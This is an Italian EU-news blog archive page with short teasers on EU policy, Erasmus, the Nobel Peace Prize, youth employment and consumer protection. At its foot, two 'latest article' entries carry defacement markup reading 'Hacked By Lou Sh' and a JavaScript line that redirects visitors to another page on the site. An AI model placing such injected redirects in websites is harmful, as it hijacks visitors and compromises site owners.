EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Dicembre 2012
it

Nel 2013 la Commissione provvederà ad emanare delle proposte per migliorare le leggi esistenti in materia di marketing ingannevole che lede le imprese, le Ong e i liberi professionisti dell’Unione.

Le truffe più frequenti sono quelle che riguardano società che hanno il compito di redigere degli annuari, associazioni che si celano dietro l’invio di moduli per l’aggiornamento gratuito dei dati delle imprese e esigono in seguito canoni annuali. Già a partire dal 2008 e successivamente nel 2011 il (...)

it

L'inchiesta sulla qualità della vita nella zona UE, viene condotta da Eurofound ogni quattro anni. Eurofound è l'organismo europeo istituito nel 1975, con mansioni di ricerca e sviluppo in tema di lavoro e condizioni di vita.

La ricerca è stata effettuata per la prima volta nel 2003, mentre il secondo step è avvenuto nel 2007, riportando interessanti dati sulle varie realtà sociali presenti nei 27 Stati membri, con l’aggiunta della Norvegia, della Macedonia e della Croazia. A settembre dello scorso anno è iniziato il (...)

it

La Corte ha ribadito che tutte le 23 lingue dell’Ue sono ufficiali e ha spiegato che “la limitazione della scelta della seconda lingua di un concorso deve fondarsi su criteri chiari, oggettivi e prevedibili”.

La goccia che ha fatto traboccare il vaso è stata la pubblicazione sulla Gazzetta Ufficiale dell’Unione, nel 2007 da parte dell’Epso (organismo Ue incaricato dell’assunzione e della formazione dei funzionari europei), di alcuni bandi di concorso per amministratori e assistenti nel settore (...)

it

Sono più di 100 le personalità europee che hanno sottoscritto una lettera aperta ai capi di Stato e di governo del’Unione Europea a sostegno e a tutela del programma Erasmus. Provenienti da ogni settore, dall'istruzione, dall'arte, dalla letteratura, dall'economia, dalla filosofia e dallo sport, tutte queste importanti personalità chiedono che il programma, importante per la crescita e l’istruzione dei più giovani sia salvaguardato dalla crisi e dai tagli economici futuri. Nonostante l’appello, il programma Erasmus sembra ancora in grave rischio tagli.

Tutti in campo per difendere la crescita dei più giovani. Questo è quanto si estrae dalla notizia riguardante una lettera aperta firmata da più di 100 personalità eminenti a salvaguardia del programma Erasmus, e a sostegno del nuovo programma che dovrebbe entrare in vigore dal 2014 “Erasmus per (...)

it

Il Parlamento europeo ha approvato con larga maggioranza il rapporto presentato dall’eurodeputata Silvia Costa, il quale mira a tutelare la presenza dei minori nel mondo di Internet. Punto centrale della sua relazione è quello di collocare i diritti dei bambini come tema trasversale nelle politiche Ue. Oltre a garantire maggiore protezione, la stessa relazione si pone come obiettivo quello di presentare le innumerevoli opportunità che il digitale mette a disposizione dei minori.

Minori e Internet La tutela dei minori su Internet è da sempre una questione al centro dell’attenzione e alla quale va attribuita la massima importanza. Stando ad una relazione presentata lo scorso aprile alla commissione Cultura del Parlamento di Strasburgo dall’eurodeputata Silvia Costa, i (...)

it

L’Esecutivo europeo ha deciso di intervenire nel settore delle reti di trasporto per rinnovarlo e rilanciarlo. Le Trans European Networks-Transport (TEN-T), istituite nel 1992, sono un punto cardine dell’Unione in quanto rappresentano il supporto concreto all'idea di coesione territoriale e di libera circolazione all'interno degli Stati membri. Gli elementi fondamentali dell’innovativa strategia sono il nuovo budget da 1,2 miliardi di euro, l’emissione di obbligazioni per il finanziamento, progetti moderni e un nuovo portale dove monitorare costantemente l’andamento dei lavori.

Nella settimana a cavallo tra la fine di novembre e l’inizio di dicembre, la Commissione ha reso noto il suo programma strategico in materia di trasporti e ha evidenziato le azioni concrete che andrà ad attuare per intervenire nel settore. Il piano stabilito dall’Esecutivo mette in evidenzia quali (...)

it

Grande soddifazione tra i vertici dell'Ue per il raggiungimento di questo importante traguardo. L'apparato delle indicazioni geografiche (IG, così sono definiti tali tipi di operazioni) oltre a rappresentare un importante mezzo di salvaguardia dei prodotti tipici, sempre più a rischio imitazione, costituisce un valido mezzo di marketing. Ovviamente sono stati dieci anche i prodotti cinesi inclusi nel progetto "10+10", i quali si aggiungono alle oltre mille denominazioni già presenti sul territorio Ue. Osservando nel dettaglio, i prodotti italiani ad aver ottenuto questa sorta di certificazione sono stati il Grana Padano ed il Prosciutto di Parma.

Il progetto ha visto la luce del sole nel lontano 2007, quando sia la Cina che l’Unione europea richiesero ufficialmente la tutela di dieci indicazioni geografiche nei territori interessati. Il tutto riguardava inizialmente prodotti agricoli. Ora ogni qualvolta una parte chiede all’altra (...)

it

Si è svolta oggi ad Oslo la cerimonia di consegna del premio Nobel per la pace all'Unione europea, continente che mantiene da sessant'anni una condizione di pace nei suoi confini e che opera costantemente per favorire la stabilità e la riconciliazione tra i territori.

Queste dunque le principali motivazioni addotte dal comitato del Nobel, per spiegare la scelta dell’Ue come vincitore del premio. Da ricordare anche il continuo contributo verso la difesa e il sostegno della democrazia e dei diritti umani. Ad essere premiati oggi in Norvegia sono stati i 500 (...)

it

È stata presentata nei giorni scorsi a Bruxelles la relazione della Commissione europea che valuta gli sforzi compiuti dalla rete europea di prevenzione della criminalità (REPC). Stando a quanto emerge dal suddetto rapporto, è anche grazie a “iniziative più mirate” e a “una collaborazione più stretta con i principali operatori nel campo della prevenzione della criminalità” che sarà possibile accrescere la sicurezza di tutti i cittadini.

La rete europea di prevenzione della criminalità (REPC) Istituita dal Consiglio europeo nel maggio del 2001, la rete REPC – in inglese EUCPN (European Crime Prevention Network) - è una piattaforma nata con l’intento di condividere prassi, informazioni e ricerche su come prevenire la criminalità in (...)

it

L’Unione europea ha adottato alla fine della scorsa settimana un provvedimento importantissimo, di cui nessuno parla perché è un tema poco conosciuto alle cronache, ritenuto tecnicamente di diritto, e perché entrerà in vigore fra due anni, quindi i suoi effetti sono lungi da venire.

È tuttavia interessante riflettervi ora, perché è vero che gli Stati membri pensano adesso solo a se stessi e a come salvarsi dalla crisi, ma l’Europa intanto lavora per ampliare il famoso spazio comune europeo di libertà, sicurezza e giustizia. La buona notizia è che non sono solo parole. Insomma, (...)

14
12
2012

Menopermenofapiù

it

Al via la settima edizione del premio nazionale ed internazionale di giornalismo ambientale per ragazzi dal titolo “giornalisti nell’erba”, nato nel 2006 su iniziativa della giornalista Paola Bolaffio con l’intento di far partecipare tutti i destinatari tra cui bambini, ragazzi, scuole, centri sportivi, ludoteche, famiglie, associazioni, agenzie educative e molti altri. Quest’anno c’è una grande novità, oltre alle fasce canoniche che sono state presenti negli anni passati (5-10 anni, 11-15 anni, 16-21 anni), sarà inserita anche una fascia di gara per i senior ovvero dai 21 ai 29 anni.

In questi sette anni si è registrata una crescita esponenziale della partecipazione a questo progetto che coinvolge sia i media con le varie pubblicazioni, sia tutto il percorso formativo dei ragazzi da quando sono bambini fino all’età adulta. Viene offerto loro anche un monitoraggio costante da (...)

it

Il 3 dicembre si è celebrata, come tutti gli anni, la Giornata Europea a favore delle persone con disabilità. Con l’arrivo di questa ricorrenza sono stati pubblicati i risultati dell’Eurobarometro sulle situazioni che circondano il mondo della disabilità in genere. I risultati mostrano un ampio parere positivo verso la maggior integrazione delle persone disabili che, per la maggior parte dei cittadini europei, devono poter vivere al 100% la propria vita sociale.

L’Eurobarometro parla chiaro: i cittadini europei chiedono a gran voce maggiore assistenza per le persone disabili. Tra le persone sollecitate ai fini dell’inchiesta il 97% ha dichiarato che le persone con disabilità dovrebbero poter vivere ogni aspetto della propria vita proprio come tutti, senza (...)

it

La Commissione europea ha lanciato il suo ultimo Pacchetto per l'occupazione giovanile che richiede la garanzia da parte di tutti gli Stati Membri che tutti i giovani ricevano un’offerta di qualità di occupazione o formazione entro quattro mesi dalla conclusione degli studi o dalla disoccupazione.

L’obiettivo principale è quello di sostenere i giovani disoccupati: aiutare coloro che hanno abbandonato la scuola o un percorso formativo senza aver conseguito il diploma di istruzione secondaria superiore, a riprendere gli studi o una formazione che diano loro le competenze necessarie per (...)

it

La SPICeS, Scuola di Politica Internazionale - Cooperazione e Sviluppo nata nel 1991, è sostenuta da Volontari nel mondo-FOCSIV, la più grande federazione di Organizzazione Non Governativa in Italia, in collaborazione con CARITAS Italiana ed U.C.S.E.I., l’Ufficio Centrale degli Studenti Esteri in Italia, e con il patrocinio della Pontificia Università Gregoriana. Alla sua XXII edizione, propone un metodo multidisciplinare che riguarda le complesse tematiche della cooperazione nelle aree del diritto internazionale, dell’economia e delle relazioni internazionali. Il piano formativo ha come obiettivo quello di far recepire la conoscenza di fondamentali strumenti operativi, costruendo moduli specialistici sul ciclo del progetto, sulla tutela dei diritti umani e sulla gestione dei conflitti.

Come si articola il corso Il corso ha durata annuale. Nel caso della città di Roma si articola in 180 ore di lezione frontale, gruppi di lavoro sul ciclo del progetto e la possibilità di effettuare stage in Italia e all’estero che va dai 3 ai 6 mesi. I giorni in cui saranno svolte le lezioni sono (...)

it

Offrire ai pazienti il controllo delle proprie cure mediche e ridurre i costi di quest’ultime, sono gli obiettivi che la Commissione europea ha deciso di perseguire tramite un nuovo piano d’azione volto a far cadere tutte quelle barriere che rappresentano un ostacolo al pieno utilizzo delle soluzioni digitali nei sistemi sanitari europei.

È da quasi un decennio, ormai, che la Commissione europea mette costantemente in pratica una serie di interventi in materia di sanità elettronica. L’intento è duplice: migliorare le prestazioni mediche a beneficio dei pazienti e rispondere alle richieste avanzate da alcuni degli Stati membri che (...)

it

Nisi Masa, l’organizzazione no-profit che dal 2001 agisce per promuovere i giovani nel settore del cinema europeo, organizza Generator, un forum dei giovani che durerà 3 giorni e che parlerà di tutte le problematiche che girano intorno al futuro della cultura audiovisiva in Europa.

Ancora parola ai giovani. Questo è quello che salta agli occhi quando si legge delle iniziative che l’Europa si sta sforzando di produrre per il futuro dei talenti europei. Una di queste è sicuramente Generator, forum dei giovani organizzato da Nisi Masa. Generator è una maratona che ha ad oggetto (...)

it

La Commissione europea comunica in questi giorni l'efficacia del progetto Comenius, ovvero dei partenariati tra scuole di differenti Stati, promossi dall'Unione europea.

I risultati vengono dal recente studio che ha preso in esame 50 scuole dislocate in 15 diversi paesi europei: Belgio, Estonia, Finlandia, Francia, Germania, Grecia, Ungheria, Italia, Paesi Bassi, Polonia, Romania, Slovacchia, Spagna, Turchia e Regno Unito. Il biennio di riferimento dell’analisi (...)

it

La quantità elevata di zolfo proveniente dalle emissioni delle navi sta danneggiando in maniera considerevole sia l’ecosistema sia la salute dei cittadini europei. L’acidificazione delle piogge e le polveri sottili, oltre a incidere sull'ambiente, portano ad un peggioramento della qualità dell’aria cittadina, andando a gravare anche sull'aspettativa di vita degli europei. La direttiva mira quindi a ridurre le emissioni e a fornire un livello di protezione più elevato per la salute umana e per quella dell’ambiente.

Nella giornata del 17 dicembre scorso sono entrate in vigore nuove norme e direttive che riguardano l’inquinamento marittimo e più in particolare i combustibili per il trasporto via mare. L’obiettivo è quello di ridurre in maniera significativa l’inquinamento atmosferico in modo da garantire una (...)

it

E’ quanto emerge da un’indagine a tappeto iniziata lo scorso giugno sui contenuti digitali di siti che vendono on line musica, video, giochi, libri o altro in formato elettronico. Nei siti analizzati si sono rilevate troppe clausole contrattuali inique, pochissime informazioni sull’identità e sui recapiti del commerciante e perdita del diritto di recesso.

Dei 333 siti web scelti dalle autorità nazionali dei paesi dell’Unione, più Norvegia e Islanda, ne sono stati selezionati 254 (76%) per ulteriori indagini, poiché si nutrono dubbi sulla conformità dei siti per quanto riguarda la normativa UE a tutela del consumatore. Inoltre si riscontrano iniquità (...)

it

After months of political incertitude, elections have been called in Italy for February 24-25, 2013, it may be the last call for change for the country.

After three and half years of Silvio Berlusconi, Mario Monti’s “non-political” government was sworn into office on 11.16.2011. When Monti took office, his fate much reassembled that of Giuliano Amato’s first government (1992-1993). Just like Monti, Amato was named prime minister in a moment of (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France